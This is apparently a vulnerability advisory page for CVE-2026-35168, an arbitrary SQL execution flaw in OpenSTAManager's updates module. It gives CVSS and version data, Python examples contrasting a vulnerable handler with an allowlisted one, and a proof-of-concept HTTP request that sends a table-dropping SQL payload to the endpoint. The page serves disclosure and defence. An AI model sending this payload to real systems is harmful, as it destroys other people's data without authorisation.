Security Vulnerability Report
CVE-2026-35168 CVSS 8.8 HIGH

Published: 2026-04-02 14:16:32
Last Modified: 2026-04-07 18:31:00

Description

OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the Aggiornamenti (Updates) module in OpenSTAManager contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization. An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further reducing database integrity protections. This issue has been patched in version 2.10.2.
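The flaw described above is a handler that decodes a JSON array and hands every element to the database driver unchanged. The following is an added example, not OpenSTAManager code (the real module is PHP on MySQL) and not the content of the 2.10.2 patch, which this page does not show. It models the pre-patch behaviour on an in-memory sqlite3 database beside a hardened handler that validates the whole batch against a per-statement allowlist before running anything. The allowlist (`ALLOWED_PREFIXES`), the sample schema, and the `PRAGMA foreign_keys` stand-in for `SET FOREIGN_KEY_CHECKS=0` are assumptions made for the demonstration.

```python
"""Toy model of CVE-2026-35168: verbatim execution of a JSON array of SQL
versus allowlisted execution. Added example on sqlite3, not the project's
code and not its patch."""
import json
import re
import sqlite3

# Hypothetical allowlist: assume a conflict resolver only needs to reconcile
# schema, so only these statement prefixes are accepted (an assumption).
ALLOWED_PREFIXES = ("ALTER TABLE", "CREATE INDEX")
# Verbs the advisory lists as reachable through the endpoint; refused even
# inside an otherwise allowlisted statement (conservative by design).
FORBIDDEN = re.compile(
    r"\b(DROP|TRUNCATE|DELETE|INSERT|UPDATE|INTO\s+OUTFILE|INTO\s+DUMPFILE|LOAD_FILE)\b",
    re.I)
# Constructed sample input: the PoC body shown on this page.
POC_BODY = '["DROP TABLE users; --"]'


class RejectedStatement(ValueError):
    """Raised by the hardened handler for any statement it refuses to run."""


def fresh_db():
    """Constructed sample schema standing in for the application database."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT);"
        "INSERT INTO users(name) VALUES ('admin');")
    return con


def table_exists(con, name):
    row = con.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)).fetchone()
    return row is not None


def columns(con, table):
    return [row[1] for row in con.execute(f"PRAGMA table_info({table})")]


def resolve_conflicts_vulnerable(con, body):
    """Pre-2.10.2 behaviour as the advisory describes it: decode the array,
    switch off integrity checks, execute every element exactly as received."""
    statements = json.loads(body)
    con.execute("PRAGMA foreign_keys = OFF")  # sqlite stand-in for SET FOREIGN_KEY_CHECKS=0
    for sql in statements:
        con.executescript(sql)  # multi-statement execution: stacked queries run too
    return len(statements)


def validate_statement(sql):
    """Return one allowlisted statement or raise RejectedStatement.

    Comment markers and stacked statements are refused outright rather than
    parsed, so a literal containing '--' or ';' is also refused. A real fix
    would use an SQL parser and the driver's single-statement API, not
    string checks; this only shows where the missing control belongs."""
    if not isinstance(sql, str):
        raise RejectedStatement("statement must be a string")
    if "--" in sql or "/*" in sql or "#" in sql:
        raise RejectedStatement("comment markers are not allowed")
    stmt = sql.strip().rstrip(";").strip()
    if ";" in stmt:
        raise RejectedStatement("one statement per array element")
    if FORBIDDEN.search(stmt):
        raise RejectedStatement("statement verb is not permitted")
    if not stmt.upper().startswith(ALLOWED_PREFIXES):
        raise RejectedStatement("statement is not on the allowlist")
    return stmt


def resolve_conflicts_hardened(con, body, max_statements=50):
    """Validate the whole batch before any write, keep FK checks on, run it
    inside one transaction (commit on success, rollback on error)."""
    statements = json.loads(body)
    if not isinstance(statements, list):
        raise RejectedStatement("expected a JSON array")
    if len(statements) > max_statements:
        raise RejectedStatement("too many statements")
    validated = [validate_statement(s) for s in statements]
    con.execute("PRAGMA foreign_keys = ON")
    with con:
        for stmt in validated:
            con.execute(stmt)
    return len(validated)


if __name__ == "__main__":
    db = fresh_db()
    resolve_conflicts_vulnerable(db, POC_BODY)
    print("vulnerable handler, users table still present:", table_exists(db, "users"))
    db = fresh_db()
    try:
        resolve_conflicts_hardened(db, POC_BODY)
    except RejectedStatement as exc:
        print("hardened handler refused the PoC body:", exc)
    ran = resolve_conflicts_hardened(db, '["ALTER TABLE users ADD COLUMN email TEXT"]')
    print("hardened handler ran", ran, "allowlisted statement(s); columns:", columns(db, "users"))
```

Validating every element before executing any of them matters as much as the allowlist itself: a batch that is half-applied when element three is rejected leaves the schema in a state neither the operator nor the updater expected, which is the integrity problem the disabled foreign-key checks already make worse.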

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:* - VULNERABLE
OpenSTAManager < 2.10.2
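The configuration above is an NVD-style cpeMatch with a `versionEndExcluding` bound. Comparing it against a deployed version as a string is a classic mistake ("2.9.9" sorts after "2.10.2" lexically). The following is an added example, not part of this report: it evaluates a version against a constructed copy of the node shown above using numeric tuple comparison, and handles the other version bounds NVD uses (`versionStartIncluding`, `versionStartExcluding`, `versionEndIncluding`) so it generalizes beyond this one entry. Nested child nodes and AND-combination with platform (non-vulnerable) matches are simplified, as noted in the code.

```python
"""Affected-version check against NVD-style cpeMatch nodes. Added example,
not part of the report; CONFIGURATIONS is a constructed copy of the entry
on this page."""
import re

CONFIGURATIONS = [{
    "nodes": [{
        "operator": "OR",
        "negate": False,
        "cpeMatch": [{
            "vulnerable": True,
            "criteria": "cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*",
            "versionEndExcluding": "2.10.2",
        }],
    }],
}]


def version_key(version):
    """'2.10.2' -> (2, 10, 2); non-numeric fragments count as 0."""
    parts = []
    for piece in re.split(r"[.\-]", version.strip()):
        m = re.match(r"\d+", piece)
        parts.append(int(m.group()) if m else 0)
    return tuple(parts)


def cmp_versions(a, b):
    """Numeric comparison with zero padding, so '2.10' == '2.10.0'."""
    ka, kb = version_key(a), version_key(b)
    n = max(len(ka), len(kb))
    ka += (0,) * (n - len(ka))
    kb += (0,) * (n - len(kb))
    return (ka > kb) - (ka < kb)


def match_applies(match, vendor, product, version):
    """True if a cpeMatch entry covers this vendor/product/version."""
    fields = match["criteria"].split(":")
    if (fields[3], fields[4]) != (vendor, product):
        return False
    cpe_version = fields[5]  # the CPE itself may pin one exact version
    if cpe_version not in ("*", "-") and cmp_versions(cpe_version, version) != 0:
        return False
    if "versionStartIncluding" in match and cmp_versions(version, match["versionStartIncluding"]) < 0:
        return False
    if "versionStartExcluding" in match and cmp_versions(version, match["versionStartExcluding"]) <= 0:
        return False
    if "versionEndIncluding" in match and cmp_versions(version, match["versionEndIncluding"]) > 0:
        return False
    if "versionEndExcluding" in match and cmp_versions(version, match["versionEndExcluding"]) >= 0:
        return False
    return True


def is_affected(configurations, vendor, product, version):
    """True if any node marks vendor/product/version vulnerable.

    Simplification: OR nodes take any vulnerable hit, AND nodes require every
    entry to hit, and 'negate' inverts the node; nested 'children' nodes are
    not modelled because the entry above has none."""
    for config in configurations:
        for node in config["nodes"]:
            hits = [m.get("vulnerable", False) and match_applies(m, vendor, product, version)
                    for m in node["cpeMatch"]]
            result = any(hits) if node.get("operator", "OR") == "OR" else all(hits)
            if node.get("negate", False):
                result = not result
            if result:
                return True
    return False


if __name__ == "__main__":
    for v in ("2.9.9", "2.10.1", "2.10.2", "2.10.10"):
        state = "affected" if is_affected(CONFIGURATIONS, "devcode", "openstamanager", v) else "not affected"
        print(f"openstamanager {v}: {state}")
```

The version the deployed instance reports is the input a practitioner feeds in; an installation that cannot be upgraded immediately should at minimum restrict who holds access to the Aggiornamenti module, since that access is the only privilege the attacker needs.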

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
http
POST /index.php?op=risolvi-conflitti-database HTTP/1.1
Host: target.com
Content-Type: application/json
Cookie: [Session Cookie]

["DROP TABLE users; --"]

References

https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74 (Patch)
https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2 (Product, Release Notes)
https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98 (Exploit, Mitigation, Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-35168",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-02T14:16:31.543",
    "lastModified": "2026-04-07T18:30:59.500",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the Aggiornamenti (Updates) module in OpenSTAManager contains a database conflict resolution feature (op=risolvi-conflitti-database) that accepts a JSON array of SQL statements via POST and executes them directly against the database without any validation, allowlist, or sanitization. An authenticated attacker with access to the Aggiornamenti module can execute arbitrary SQL statements including CREATE, DROP, ALTER, INSERT, UPDATE, DELETE, SELECT INTO OUTFILE, and any other SQL command supported by the MySQL server. Foreign key checks are explicitly disabled before execution (SET FOREIGN_KEY_CHECKS=0), further reducing database integrity protections. This issue has been patched in version 2.10.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-89"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:devcode:openstamanager:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "2.10.2",
                "matchCriteriaId": "37690084-64E6-4E8B-8A92-8B55C8FC1E9F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/devcode-it/openstamanager/commit/43970676bcd6636ff8663652fd82579f737abb74",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/devcode-it/openstamanager/releases/tag/v2.10.2",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      },
      {
        "url": "https://github.com/devcode-it/openstamanager/security/advisories/GHSA-2fr7-cc4f-wh98",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      }
    ]
  }
}